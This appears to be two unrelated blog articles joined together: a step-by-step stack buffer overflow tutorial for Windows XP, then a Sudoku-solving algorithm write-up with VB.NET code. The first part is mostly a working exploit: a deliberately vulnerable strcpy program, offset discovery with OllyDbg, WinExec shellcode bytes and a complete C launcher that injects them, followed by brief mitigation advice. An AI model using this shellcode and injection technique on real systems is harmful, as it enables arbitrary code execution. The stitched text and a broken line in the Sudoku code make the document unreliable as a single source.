Exploit the buffer – Buffer Overflow Attack

Exploit the buffer – Buffer Overflow Attack

Theoretical Introduction:

A program is a set of instructions that aims to perform a specific task. In order to run any program, the source code must first be translated into machine code. The compiler translates high level language into low level language whose output is an executable file. In order to simplify the machine code representation to the user it is displayed in hexadecimal format. The executable file is then run in memory which is divided into two parts which are the text part and the data part [1]. In memory, the machine code of a program is loaded into the memory text part which is a read only area and can’t be changed [1]. If the program contains any static variables such as the global variables or constants, then these static variables are stored in a part of memory called the static data [1]. Then during the program runtime the instructions are allocated in memory on either the heap or the stack depending on the type of memory allocation used to allocate the variables (by value or by reference). This process of memory allocation for the text memory part followed by the static data part followed by the stack or heap is done from lower to higher memory addresses [1]. The heap grows from lower to higher memory addresses whereas in the stack data is allocated from higher to lower memory based on the concept of Last in First out (LIFO) where the last element that enters the stack is the first one to go out (Fig.1) [1]. The stack is a continuous space in memory where the information about any running function is stored which can be either data or addresses.

Figure 1

For example, assume we have the following program [2]:


void fn1() {

 

char buffer1[5];

 

char buffer2[10];

 

}

 

void main() {

 

fn1();

 

}

 

By looking at the assembly language output we see that the call to fn1() is translated to:

 

push %ebp

 

mov %esp,%ebp

 

sub $20,%esp

The stack allocation of the above program is shown below:

High Memory

Return address of main

EBP

Buffer1

Buffer1

Buffer2

Buffer2

Low Memory

Buffer2

The ESP, EBP and EIP registers are 32 bit cpu registers. The ESP register (stack pointer) always points to the top of the stack where the last element in the stack is stored (the lowest memory address). The EBP register (base pointer) is used to point to the current frame pointer which corresponds to a call to a function that hasn’t returned yet. The EIP register contains the address of the next instruction to be executed.

Each time a function is called the address of the next instruction following the call is pushed into the stack, this value is obtained from the EIP register of the cpu. The return address is stored in the stack in order to return back correctly to the next instruction following the function call. After pushing the EIP value, the EBP value obtained from the EBP register of the cpu is pushed into the stack which corresponds to a new frame pointer for the currently called function. The ESP register always points to the top of the stack. Memory is always allocated in blocks of word size that’s why buffer1 is allocated 8 bytes instead of 5 and buffer2 is allocated 12 bytes instead of 10 [2].

Hackers can utilize the vulnerability of having the return address stored in the stack and try to overflow the buffer by entering data larger than its allocated size in the stack by taking advantage of the lack of boundary checking of C or C++ code for some instructions. The instructions that lack boundary checking include: gets(), strcpy(), strcat(), sprintf(), vsprintf(), scanf(), sscanf(), fscanf(),… [3]

Buffer flow vulnerabilities have been increasing recently [1]. Attackers who exploit the buffer overflow vulnerability take the advantage of the presence of the return address of a running function in the stack and try to change this return address in order to execute any executable file they choose or simply crash the system. This can be achieved by overflowing the buffer with data larger than its size until reaching the location of the return address in the stack. This return address can be overwritten by the address of a malicious code causing the program to execute this malicious code instead of returning to the main. The return address can also be written by any data causing the program to jump to an unidentifiable address and thus causing a segmentation error and causing the program to crash [4].

Brief Outline of the Steps

The hacker trying to achieve a buffer overflow should undergo the following steps:

  1. He should identify the existence of buffer overflow vulnerability. When a user enters a long string of characters as an input to a program and the program displays access violation error then this program is identified as having buffer overflow vulnerability and now the hacker can use this program as its target to execute malicious code.
  2. He should identify the location of return address inside the stack. Identifying the buffer size is not sufficient enough to identify the return address location in the stack because there is sometimes an unidentified number of junk between the ebp and the eip values stored in the stack. The return address location is found by performing a brute force where a long string of distinct characters are entered as an input (each character is repeated four times so that it occupies one word location e.g., AAAABBBBCCCCDDDD), and ollydbg is used to identify which character of the above entered characters is stored in the return address and thus the location of the return address is identified.
  3. He should find the shellcode of the code he wants to execute. This shellcode is entered as input into the vulnerable program where nops (no operation) are used in case the shellcode doesn’t fill the entire buffer. Ollydbg is then used to identify the address of this shellcode.
  4. He should write and run the program function that will execute the vulnerable code containing buffer overflow where the shellcode is written into the buffer and Nops are added if there are additional unfilled bytes in the buffer, and the address of the start of the buffer is placed into the return address in the stack.

List of Machines and Software Used

  • Windows xp sp2
  • Microsoft visual studio framework(Buffer security check turned off)
  • C or C++ code containing at least one of the buffer overflow vulnerable instructions.
  • Ollydbg

Attack Explained

  1. Write the following C application which simply copies an input string into a buffer of size 49 bytes:

#include <stdio.h>

#include <stdlib.h>

#include <conio.h>

#include <string.h>

int fn1(char *str){

    char local[49];

    strcpy(local,str);

return 0;

}

int main(int argc,char * args[]){

fn1(args[1]);

return 0;

}

  1. Call the program by passing input string of size less than 49 characters, the program executes normally:

    Open cmd and type buffer.exe AAAABBBBCCCC

  1. Try to discover the presence of the buffer overflow vulnerability in the C code by passing a large string parameter.

Open cmd and type:

buffer.exe AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO

Since this program displayed an error when we enter a long string of characters as an input, then this program is identified as containing the buffer overflow vulnerability and can now be used as our target to execute shellcode. The program has the buffer overflow vulnerability because it uses the strcpy instruction which copies the input instruction into a string of size 49 characters. So if we enter a string having size larger than 49 characters, the stack will be corrupted because the return address saved in the stack is overwritten with an address from the string that is an unidentifiable address. Hackers can now exploit this vulnerability by entering a large string that overwrites the return address with the address of their malicious code.

  1. Try to identify the location of the return address in the stack.
    1. open buffer.exe using the ollydbg and pass the following long string parameter:

      AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

      Each character is repeated 4 times so that each letter occupies a word size memory location.

    2. Keep on pressing run until reaching the return instruction. Press run and check the value of EIP in the registers panel:

    3. The value of EIP is 4F4F4F4F which is the hexadecimal representation of OOOO.

We conclude that the return address is located 56 characters from the beginning of the input string:

52 bytes are reserved in the stack for the buffer of size 49. This buffer reserved 52 bytes instead of 49 bytes because memory is allocated in terms of word size which is 4 bytes.

The following 4 bytes are reserved for the value of the ebp register.

After 56 bytes from the string start the return address which is the value of the eip register is found. The stack looks like the following:

OOOO (place of the Return address which is the value of EIP)
NNNN ( EBP)
MMMM
LLLL
KKKK
JJJJ
IIII
HHHH
GGGG
FFFF
EEEE
DDDD
CCCC
BBBB
AAAA

So now any 4 bytes we place after the following string

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKLLLLMMMMNNNN (which will be replaced by shellcode) will replace the contents of the return address and the program will now jump to the entered address in the return address location instead of returning back to the main.

  1. Now that we have identified the location of the return address we need to write our shellcode that will run a calculator and call exit so that no error will be displayed to the user and he won’t know that his code has been exploited.

The steps are the following:

  1. Find the assembly code of WinExec and how it is called from the documentation of windows global _start
  2. _start:
  3. jmp short GetCommand
  4. CommandReturn:
  5.      pop ebx     ;ebx now holds the handle to the string
  6.      xor eax,eax
  7.      push eax
  8.      xor eax,eax     ;for some reason the registers can be very volatile, did this just in case
  9.      mov [ebx + 89],al     ;insert the NULL character
  10.      push ebx
  11.      mov ebx,0x758ee695
  12.      call ebx     ;call WinExec(path,showcode)
  13.      xor eax,eax     ;zero the register again, clears winexec retval
  14.      push eax
  15.      mov ebx, 0x758b2acf
  16.      call ebx     ;call ExitProcess(0);
  17. GetCommand:
  18.     ;the N at the end of the db will be replaced with a null character
  19.     call CommandReturn
  20.     db “calc.exe”

  21. Find the address of WinExec and ExitProcess using arwin tool. These addresses are different on every machine.


  1. Replace the old addresses of WinExec and ExitProcess in the assembly code with the new addresses found.

  2. Extract the assembly code and compile it to object code using nasm tool.


  1. Convert the object code to opcode using ld tool.


  1. Dump the shellcode using objdump tool.


Now we have found the shellcode of running a calculator followed by an exit which is the following:

\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65

This shellcode will be written in place of the buffer and since the shellcode size is less than the buffer size we add nops (no operations) at the beginning of the buffer which won’t affect the code. The nop is represented by \x90.

  1. Now we need to find the address of the buffer because the shellcode is written in its place. To find this address we will use the ollydbg.
    1. Open buffer.exe using the ollydbg and pass the following parameter:

      AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQ

    2. Look into the stack place and scroll up to find the following pattern of hexadecimals :

      4141414142424242434343434444444445454545464646464747474748484848494949494A4A4A4A4B4B4B4B4C4C4C4C4D4D4D4D…


      The address of buffer is identified as 0013FF40 (the place of 41414141 which is the hexadecimal representation of AAAA). Now we know the address of the shellcode is 0013FF40 which is represented as \x40\xFF\x13. We avoid using the null character \x00 because it would terminate the string.

  2. Create the attack application which calls buffer.exe with our shellcode:

    #include <stdio.h>

    #include <windows.h>

    int main (){

    //the executable filename of the vulnerable app

    char xp[70]=”buffer.exe “;

    //Address of the shellcode

    char ret[]= “\x40\xFF\x13″;

    //the shellcode of calc.exe winxp followed by exit

    char of[] =

    “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65″;

    // concatenated buffer.exe by the shellcode followed by the address of the shellcode

    strcat(xp,of);

    strcat(xp,ret);

    //execute the concatenated string

    WinExec(xp,0);

    return 0;

    }

    Note that few NOPS were added at the beginning of the shellcode in order to fill the buffer since the shellcode doesn’t fill it completely. The stack will look like the following:

\x40\xFF\x13
\x2e\x65\x78\x65
\x63\x61\x6c\x63
\xe0\xff\xff\xff
\x7c\xff\xd3\xe8
\xbb\xa2\xca\x81
\xd3\x31\xc0\x50
\x11\x86\x7c\xff
\x59\x53\xbb\x4d
\x31\xc0\x88\x43
\x5b\x31\xc0\x50
\x90\x90\xeb\x1b
\x90\x90\x90\x90
\x90\x90\x90\x90
\x90\x90\x90\x90
  1. Finally, execute the exploit:

The overflow has been successfully executed since the calculator has been run.

How to avoid Buffer overflows

  • Try to use different languages that can do bound checking other than C or C++. But if you’re writing a C or C++ code use instructions that perform bound checking. For example, instead of using the strcpy or strcat instructions use the strncat or the strncpy [1].
  • Try to write secure programs by writing additional code that can do bound checking [1].
  • You can use tools that can analyze the source code for any buffer overflow vulnerabilities [1].
  • Patch the system, since new systems have been developed taking buffer overflow into consideration to avoid it [1].
  • Set the buffer security check to positive in the properties of the running program in the visual studio framework. This will disable buffer overflow vulnerability from hacking the program and identifying the return address location.

References

[1] http://www.sans.org/reading_room/whitepapers/securecode/buffer-overflow-attack-mechanism-method-prevention_386

[2] http://insecure.org/stf/smashstack.html

[3] http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/buffer-overflow.html

[4] http://www.cs.umass.edu/~trekp/csc262/lectures/04c.pdf

[5] http://www.acsac.org/2005/papers/119.pdf

[6] http://isis.poly.edu/kulesh/stuff/etc/bo.pdf

[7] http://ieeexplore.ieee.org/Xplore/login.jsp?url=http%3A%2F%2Fieeexplore.ieee.org%2Fiel5%2F6658%2F17794%2F00821514.pdf%3Farnumber%3D821514&authDecision=-203


Parallel Depth-First Sudoku Solver Algorithm

Sudoku layout

Image via Wikipedia

Preparing to go parallel with depth-first search using Sudoku as case study
Ali Tarhini
04/06/2011

Contents

  1. What is Sudoku?.
  2. Rules of Sudoku.
  3. Computational Complexity.
  4. Sudoku Solving Techniques.
  5. Elimination.
  6. Finding Lone Rangers.
  7. Finding Twins.
  8. Finding Triplets.
  9. Brute-Force Elimination.
  10. Going Parallel

What is Sudoku?

Sudoku is the wildly popular new puzzle game that is taking the world by storm. Sudoku puzzles are 9×9 grids, and each square in the grid consists of a 3×3 subgrid called a minigrid. Your goal is to fill in the squares so that each column, row, and minigrid contains the numbers 1 through 9 exactly once. And some squares already contain numbers or symbols, which lend clues toward the solution. While the rules of Sudoku are extremely simple, solving a Sudoku puzzle is an intellectual challenge.

Figure1: Empty Sudoku grid

Rules of Sudoku

The aim of the game is to place a number from 1 to 9 into each of the cells, such that each

number must appear exactly once in each row and in each column in the grid. Additionally, each minigrid must contain all the numbers 1 through 9. A Sudoku puzzle usually comes with a partially filled grid. The aim is to complete the grid in the shortest amount of time.

Figure2: Partially filled Sudoku grid

Computational Complexity

From a mathematical perspective, it has been proven that the total number of valid Sudoku grids is 6,670,903,752,021,072,936,960 or approximately 6.671×1021 [1].

Trying to populate all these grids is itself a difficult problem because of the huge number, Assuming each solution takes 1 micro second to be found, then with a simple calculation we can determine that it takes 211,532,970,320.3 years to find all possible solutions.

If that number was small, say 1000, it would be very easy to write a Soduku solver application that can solve a given puzzle in short amount of time. The program would simply enumerate all the 1000 puzzles and compares the given puzzle with the enumerated ones. Unfortunately, this is not the case since the actual number of possible valid grids is extremely large so it’s not possible to enumerate all the possible solutions. This large number also directly eliminates the possibility of solving the puzzle with brute force technique in a reasonable amount of time. Therefore, a method for solving the puzzle quickly will be derived that takes advantage of some “logical” properties of Sudoku to reduce the search space and optimize the running time of the algorithm. Our goal off course, is to allow for that algorithm to take advantage of the manycore architecture to further reduce its running time. This is very important and is at the heart of our work because we can extend the 9×9 Sudoku grid to an NxN grid and as you would expect the complexity of the puzzle goes up by a big notch. Hence, the parallel algorithm must also scale as the grid size increases.

Sudoku Solving Techniques

Elimination

Elimination technique is probably one of the simplest ways to start solving a Sudoku grid. Basically this method scans the grid from the top left cell to the bottom right cell going one row at a time and looks for each cell, it checks whether the number of possible values is equal to 1 then it assigns the single possible number to the cell. This method is straight forward and is a basic step when deciding on which value to fill in a cell. The figure below shows the highlighted cell in green which could be assigned one possible value that happens to be 1 too since values 2,4,5,7 are in the same minigrid. 3, 6, 8 are on the same row and 9 is on the same row.

Figure2: 1 value is possible for the green cell

The method GetCellPossibleValues takes in the X and Y coordinates of the cell and determines the set of possible values for the cell. This method is important because it is being called almost everytime a value is about to be assigned to a cell and seems to be parallelizable since it is divided into three independent operations: row scan, column scan and minigrid scan:

<pre>

Public Function GetCellPossibleValues(ByVal XIndex As Byte, ByVal YIndex As Byte) As List(Of Byte)

Dim c As New Cell

c.PossibleValues.Clear()

For Each b As Byte In mCells(XIndex, YIndex).PossibleValues

c.PossibleValues.Add(b)

Next

For i As Byte = 0 To 8

If Not mCells(i, YIndex).Type = Cell.CellType.Empty AndAlso i <> XIndex AndAlso mCells(XIndex, YIndex).PossibleValues.Contains(mCells(i, YIndex).Value) Then

c.PossibleValues.Remove(mCells(i, YIndex).Value)

End If

If Not mCells(XIndex, i).Type = Cell.CellType.Empty AndAlso i <> YIndex AndAlso mCells(XIndex, YIndex).PossibleValues.Contains(mCells(XIndex, i).Value) Then

c.PossibleValues.Remove(mCells(XIndex, i).Value)

End If

Next

Dim regionX As Byte = Math.Ceiling((XIndex + 1) / 3 – 1) * 3

Dim regionY As Byte = Math.Ceiling((YIndex + 1) / 3 – 1) * 3

For i As Byte = regionX To regionX + 2

For j As Byte = regionY To regionY + 2

If Not mCells(i, j).Type = Cell.CellType.Empty AndAlso i <> XIndex AndAlso j <> YIndex AndAlso mCells(XIndex, YIndex).PossibleValues.Contains(mCells(i, j).Value) Then

c.PossibleValues.Remove(mCells(i, j).Value)

End If

Next

Next

Return c.PossibleValues

End Function

</pre>

Finding Lone Rangers

A Lone Ranger is a number that is one of multiple values for a cell but it appears only once in a row, column or minigrid. For example, the green cell shown in the figure below has 4 possible values. Intuitively, a human solving this grid will most likely to skip this cell because it seems “too early to predict its value” because of the several values possible. But if we take a closer look at the cell’s row, note that the number 8 appears only once in the row and it appears as a possible value for that cell. Hence, 8 is indeed the correct value for that cell.

The following 3 methods loop over the grid in rows, columns and minigrids and look for Lone Rangers, if one is found, its value is set directly and thus furthermore reducing the solution space.

<pre>

Public Function SetLoneRangersRow() As Boolean

Dim x As Byte = 0, y As Byte = 0

Dim changes As Boolean = False

Dim totalChanges As Boolean = False

Do

changes = False

For i As Byte = 0 To 8

For B As Byte = 1 To 9

Dim count As Byte = 0

For j As Byte = 0 To 8

If mCells(j, i).Type = Cell.CellType.Empty Then

If mCells(j, i).PossibleValues.Contains(B) Then

count += 1

If count > 1 Then Exit For

x = j

y = i

End If

End If

Next

If count = 1 Then

mCells(x, y).Value = B

mCells(x, y).IsValid = True

changes = True

totalChanges = True

End If

Next

Next

Loop Until Not changes

Return totalChanges

End Function

Public Function SetLoneRangersColumn() As Boolean

Dim x As Byte = 0, y As Byte = 0

Dim changes As Boolean = False

Dim totalChanges As Boolean = False

Do

changes = False

For i As Byte = 0 To 8

For B As Byte = 1 To 9

Dim count As Byte = 0

For j As Byte = 0 To 8

If mCells(i, j).Type = Cell.CellType.Empty Then

If mCells(i, j).PossibleValues.Contains(B) Then

count += 1

x = i

y = j

If count > 1 Then Exit For

End If

End If

Next

If count = 1 Then

mCells(x, y).Value = B

mCells(x, y).IsValid = True

changes = True

totalChanges = True

End If

Next

Next

Loop Until Not changes

Return totalChanges

End Function

Private Function SetLoneRangersRegion() As Boolean

Dim x As Byte = 0, y As Byte = 0

Dim counter As Byte = 0

Dim nextRegion As Boolean = False

Dim changes As Boolean = False

Dim totalChanges As Boolean = False

Do

changes = False

For B As Byte = 1 To 9

For i As Byte = 0 To 8 Step 3

For j As Byte = 0 To 8 Step 3

nextRegion = False

counter = 0

For r As Byte = i To i + 2

For c As Byte = j To j + 2

If mCells(c, r).Type = Cell.CellType.Empty Then

If mCells(c, r).PossibleValues.Contains(B) Then

counter += 1

x = c

y = r

If counter > 1 Then

nextRegion = True

Exit For

End If

End If

End If

Next

If nextRegion Then Exit For

Next

If (Not nextRegion) AndAlso counter = 1 Then

mCells(x, y).Value = B

mCells(x, y).IsValid = True

changes = True

totalChanges = True

End If

Next

Next

Next

Loop Until Not changes

Return totalChanges

End Function

</pre>

The flowchart below shows how the algorithm works after applying the Lone Rangers methods.

Figure3: Flowchart for solving Sudoku using elimination and lone ranger’s property.

Finding Twins

Twins are two cells that contain two numbers that appear nowhere else but in these cells on the same row, column or minigrid. For example, take a look at the two green cells below, both have the same two possible values 4 and 9 on the same column. This means that if one of the cells were to be assigned the value 4, the other cell will be assigned the value 9 and vice versa. Therefore we can be confident that 4 and 9 will not be assigned to any other cell on the same column. Therefore we remove the value 9 from the remaining cell in the same column that had two possible values 6 and 9 so that cell has only value 6 left. By process of elimination 6 will be assigned to that cell.

Figure4: A typical twins case

The following 3 methods implement the twins elimination method.

<pre>

Public Function SetTwinsRow() As Boolean

Dim changes As Boolean = False

For i As Byte = 0 To 8

For j As Byte = 0 To 8

If mCells(j, i).Type = Cell.CellType.Empty Then

If mCells(j, i).PossibleValues.Count = 2 Then

For k As Byte = j + 1 To 8

If mCells(j, i).StringPossibleValues = mCells(k, i).StringPossibleValues Then

For l As Byte = 0 To 8

If mCells(l, i).Type = Cell.CellType.Empty AndAlso l <> k AndAlso l <> j Then

If mCells(l, i).PossibleValues.Contains(mCells(j, i).PossibleValues(0)) Then

mCells(l, i).PossibleValues.Remove(mCells(j, i).PossibleValues(0))

changes = True

End If

If mCells(l, i).PossibleValues.Contains(mCells(j, i).PossibleValues(1)) Then

mCells(l, i).PossibleValues.Remove(mCells(j, i).PossibleValues(1))

changes = True

End If

If changes AndAlso mCells(l, i).PossibleValues.Count = 1 Then

mCells(l, i).Value = mCells(l, i).PossibleValues(0)

mCells(l, i).IsValid = True

True

End If

End If

Next

End If

Next

End If

End If

Next

Next

Return changes

End Function

Public Function SetTwinsColumn() As Boolean

Dim changes As Boolean = False

For i As Byte = 0 To 8

For j As Byte = 0 To 8

If mCells(i, j).Type = Cell.CellType.Empty Then

If mCells(i, j).PossibleValues.Count = 2 Then

For k As Byte = j + 1 To 8

If mCells(i, j).StringPossibleValues = mCells(i, k).StringPossibleValues Then

For l As Byte = 0 To 8

If mCells(i, l).Type = Cell.CellType.Empty AndAlso l <> k AndAlso l <> j Then

If mCells(i, l).PossibleValues.Contains(mCells(i, j).PossibleValues(0)) Then

mCells(i, l).PossibleValues.Remove(mCells(i, j).PossibleValues(0))

changes = True

End If

If mCells(i, l).PossibleValues.Contains(mCells(i, j).PossibleValues(1)) Then

mCells(i, l).PossibleValues.Remove(mCells(i, j).PossibleValues(1))

changes = True

End If

End If

If changes AndAlso mCells(i, l).PossibleValues.Count = 1 Then

mCells(i, l).Value = mCells(i, l).PossibleValues(0)

mCells(i, l).IsValid = True

End If

Next

End If

Next

End If

End If

Next

Next

Return changes

End Function

Public Function SetTwinsRegion() As Boolean

Dim changes As Boolean = False

For i As Byte = 0 To 8

For j As Byte = 0 To 8

If mCells(i, j).Type = Cell.CellType.Empty AndAlso mCells(i, j).PossibleValues.Count = 2 Then

Dim regionX As Byte = Math.Ceiling((i + 1) / 3 – 1) * 3

Dim regionY As Byte = Math.Ceiling((j + 1) / 3 – 1) * 3

For k As Byte = regionX To regionX + 2

For l As Byte = regionY To regionY + 2

If mCells(k, l).Type = Cell.CellType.Empty Then

If i <> k AndAlso j <> l AndAlso mCells(i, j).StringPossibleValues = mCells(k, l).StringPossibleValues Then

For m As Byte = regionX To regionX + 2

For n As Byte = regionY To regionY + 2

If m <> k AndAlso m <> i AndAlso n <> l AndAlso n <> j Then

If mCells(m, n).PossibleValues.Contains(mCells(i, j).PossibleValues(0)) Then

mCells(m, n).PossibleValues.Remove(mCells(i, j).PossibleValues(0))

changes = True

End If

If mCells(m, n).PossibleValues.Contains(mCells(i, j).PossibleValues(1)) Then

mCells(m, n).PossibleValues.Remove(mCells(i, j).PossibleValues(1))

changes = True

End If

If changes AndAlso mCells(m, n).PossibleValues.Count = 1 Then

mCells(m, n).Value = mCells(m, n).PossibleValues(0)

mCells(m, n).IsValid = True

End If

End If

Next

Next

End If

End If

Next

Next

End If

Next

Next

Return changes

End Function

</pre>

Finding Triplets

As with twins, we might also come across triplets. These are three cells on the same row, column or minigrid that share 3 unique values. For example, the figure below shows the second column of the grid with 3 cells highlighted in green. The three cells could be assigned with only three possible values each, 3, 6 and 9. Therefore the three numbers shall be removed from the remaining cell with four possible values 2, 3, 6 and 9. Hence, 2 remains the only possible value for that cell and will be assigned to it.

Figure5: A typical Triplets scenario

However, it is worth mentioning unlike lone rangers and twins, triplets could have 3 variants:

Variant 1: Three cells with the same three possible values as shown in figure 5 in the last section)

Variant 2: Two cells with three possible values and one cell containing two possible values that are a subset of the three possible values

Variant 3: One cell with three possible values and two cells containing two possible values that are a subset of the three possible values

The code below implements the 3 methods for triplets detection using the 3 variants in rows, columns and minigrids

<pre>

Public Function SetTripletsColumn() As Boolean

Dim changes As Boolean = False

For i As Byte = 0 To 8

For j As Byte = 0 To 8

If mCells(i, j).Type = Cell.CellType.Empty AndAlso mCells(i, j).PossibleValues.Count = 3 Then

Dim w, v As Byte

Dim flag As Boolean = True

Dim partialChanges As Boolean = False

For k As Byte = j + 1 To 8

If mCells(i, k).Type = Cell.CellType.Empty Then

If mCells(i, j).StringPossibleValues = mCells(i, k).StringPossibleValues OrElse _

(mCells(i, k).PossibleValues.Count = 2 AndAlso mCells(i, j).PossibleValues.Contains(mCells(i, k).PossibleValues(0)) _

AndAlso mCells(i, j).PossibleValues.Contains(mCells(i, k).PossibleValues(1))) Then

If flag Then

w = k

flag = False

Else

v = k

partialChanges = True

End If

End If

End If

Next

If partialChanges Then

For l As Byte = 0 To 8

If l <> j AndAlso l <> w AndAlso l <> v Then

If mCells(i, l).PossibleValues.Contains(mCells(i, j).PossibleValues(0)) Then

mCells(i, l).PossibleValues.Remove(mCells(i, j).PossibleValues(0))

changes = True

End If

If mCells(i, l).PossibleValues.Contains(mCells(i, j).PossibleValues(1)) Then

mCells(i, l).PossibleValues.Remove(mCells(i, j).PossibleValues(1))

changes = True

End If

If mCells(i, l).PossibleValues.Contains(mCells(i, j).PossibleValues(2)) Then

mCells(i, l).PossibleValues.Remove(mCells(i, j).PossibleValues(2))

changes = True

End If

If changes AndAlso mCells(i, l).PossibleValues.Count = 1 Then

mCells(i, l).Value = mCells(i, l).PossibleValues(0)

mCells(i, l).IsValid = True

End If

End If

Next

End If

End If

Next

Next

Return changes

End Function

Public Function SetTripletsRow() As Boolean

Dim changes As Boolean = False

For i As Byte = 0 To 8

For j As Byte = 0 To 8

If mCells(j, i).Type = Cell.CellType.Empty AndAlso mCells(j, i).PossibleValues.Count = 3 Then

Dim w, v As Byte

Dim flag As Boolean = True

Dim partialChanges As Boolean = False

For k As Byte = j + 1 To 8

If mCells(k, i).Type = Cell.CellType.Empty Then

If mCells(j, i).StringPossibleValues = mCells(k, i).StringPossibleValues OrElse _

(mCells(k, i).PossibleValues.Count = 2 AndAlso mCells(j, i).PossibleValues.Contains(mCells(k, i).PossibleValues(0)) _

AndAlso mCells(j, i).PossibleValues.Contains(mCells(k, i).PossibleValues(1))) Then

If flag Then

w = k

flag = False

Else

v = k

partialChanges = True

End If

End If

End If

Next

If partialChanges Then

For l As Byte = 0 To 8

If l <> j AndAlso l <> w AndAlso l <> v Then

If mCells(l, i).PossibleValues.Contains(mCells(j, i).PossibleValues(0)) Then

mCells(l, i).PossibleValues.Remove(mCells(j, i).PossibleValues(0))

changes = True

End If

If mCells(l, i).PossibleValues.Contains(mCells(j, i).PossibleValues(1)) Then

mCells(l, i).PossibleValues.Remove(mCells(j, i).PossibleValues(1))

changes = True

End If

If mCells(l, i).PossibleValues.Contains(mCells(j, i).PossibleValues(2)) Then

mCells(l, i).PossibleValues.Remove(mCells(j, i).PossibleValues(2))

changes = True

End If

If changes AndAlso mCells(l, i).PossibleValues.Count = 1 Then

mCells(l, i).Value = mCells(l, i).PossibleValues(0)

mCells(l, i).IsValid = True

End If

End If

Next

End If

End If

Next

Next

Return changes

End Function

Public Function SetTripletsRegion() As Boolean

Dim changes As Boolean = False

For i As Byte = 0 To 8

For j As Byte = 0 To 8

If mCells(i, j).Type = Cell.CellType.Empty AndAlso mCells(i, j).PossibleValues.Count = 3 Then

Dim regionX As Byte = Math.Ceiling((i + 1) / 3 – 1) * 3

Dim regionY As Byte = Math.Ceiling((j + 1) / 3 – 1) * 3

Dim w, v, x, y As Byte

Dim flag As Boolean = True

Dim partialChanges As Boolean = False

For r As Byte = regionX To regionX + 2

For c As Byte = regionY To regionY + 2

If (Not (i = r AndAlso j = c)) AndAlso (mCells(i, j).StringPossibleValues = mCells(r, c).StringPossibleValues OrElse _

(mCells(r, c).PossibleValues.Count = 2 AndAlso mCells(i, j).PossibleValues.Contains(mCells(r, c).PossibleValues(0)) _

AndAlso mCells(i, j).PossibleValues.Contains(mCells(r, c).PossibleValues(1)))) Then

If flag Then

w = r

v = c

flag = False

Else

x = r

y = c

partialChanges = True

End If

End If

Next

Next

flag = True

If partialChanges Then

For k As Byte = regionX To regionX + 2

For l As Byte = regionY To regionY + 2

If Not (k = i AndAlso l = j) AndAlso Not (k = w AndAlso l = v) AndAlso Not (k = x AndAlso l = y) Then

If mCells(k, l).PossibleValues.Contains(mCells(i, j).PossibleValues(0)) Then

mCells(k, l).PossibleValues.Remove(mCells(i, j).PossibleValues(0))

changes = True

End If

If mCells(k, l).PossibleValues.Contains(mCells(i, j).PossibleValues(1)) Then

mCells(k, l).PossibleValues.Remove(mCells(i, j).PossibleValues(1))

changes = True

End If

If mCells(k, l).PossibleValues.Count > 2 Then

If mCells(k, l).PossibleValues.Contains(mCells(i, j).PossibleValues(2)) Then

mCells(k, l).PossibleValues.Remove(mCells(i, j).PossibleValues(2))

changes = True

End If

End If

If changes AndAlso mCells(k, l).PossibleValues.Count = 1 Then

mCells(k, l).Value = mCells(k, l).PossibleValues(0)

mCells(k, l).IsValid = True

End If

End If

Next

Next

End If

End If

Next

Next

Return changes

End Function

</pre>

Brute-Force Elimination

When all logical means have been used to solve a Sudoku puzzle and the puzzle remains unsolved, we have to perform some guesswork and choose a value for a cell and see if that helps to solve a puzzle but which cell? As a heuristic I have decided to choose the cell with the least number of possible values. This will decrease the probability of guessing it wrong.I should also mention that the possibility of a wrong guessing, so what happens if the algorithm guessed a value that turned out to be yield an unsovable puzzle within few steps. To work around the problem, we introduce the notion of “backtracking” or simply, undoing the puzzle to a previous state just before we took the wrong guess and continue from there by taking a different guess. To get the undo strategy working, we will utilize the classic stack data structure. When a guess is made, a copy of the puzzle is pushed onto the stack before the guess is taken. When a dead end is reached, the puzzle is popped from the stack and replaces the current unsolvable one.

The methods below implement the brute force algorithm for solving the puzzle with guessing

<pre>

Private Sub FindSmallestPossibilities(ByRef XIndex As Byte, ByRef YIndex As Byte)

Dim min As Byte = 10

For i As Byte = 0 To 8

For j As Byte = 0 To 8

If mCells(j, i).Type = Cell.CellType.Empty AndAlso mCells(j, i).PossibleValues.Count < min Then

min = mCells(j, i).PossibleValues.Count

XIndex = j

YIndex = i

End If

Next

Next

End Sub

Private CellsStack As New Stack(Of Cell(,))

Private StopBruteForce As Boolean = False

Private Sub BruteForceRecursive(Optional ByVal HintOnly As Boolean = False)

Dim i, j As Byte

FindSmallestPossibilities(j, i)

Try

CellsStack.Push(mCells.Clone)

Catch ex As StackOverflowException

Return

End Try

While mCells(j, i).PossibleValues.Count > 0

mCells(j, i).Value = mCells(j, i).PickNumber()

If SolveLogical(HintOnly) Then

StopBruteForce = True

mCells(j, i).IsValid = True

Return

Else

Dim goodMove As Boolean = True

For y As Byte = 0 To 8

For k As Byte = 0 To 8

If mCells(y, k).Type = Cell.CellType.Empty AndAlso mCells(y, k).PossibleValues.Count = 0 Then

goodMove = False

Exit For

End If

Next

Next

If goodMove Then

mCells(j, i).IsValid = True

BruteForceRecursive()

If StopBruteForce Then Return

Else

If CellsStack.Count > 0 Then

mCells = CellsStack.Pop

Else

Return

End If

End If

End If

End While

End Sub

</pre>

Even though I call this technique brute-force elimination, solving the puzzle using this technique does not imply that we are solving the entire puzzle by guesswork. In fact, for most puzzles, you need to apply the brute-force elimination technique only a few times, and then you can solve the rest of the grid by other logical techniques covered earlier.

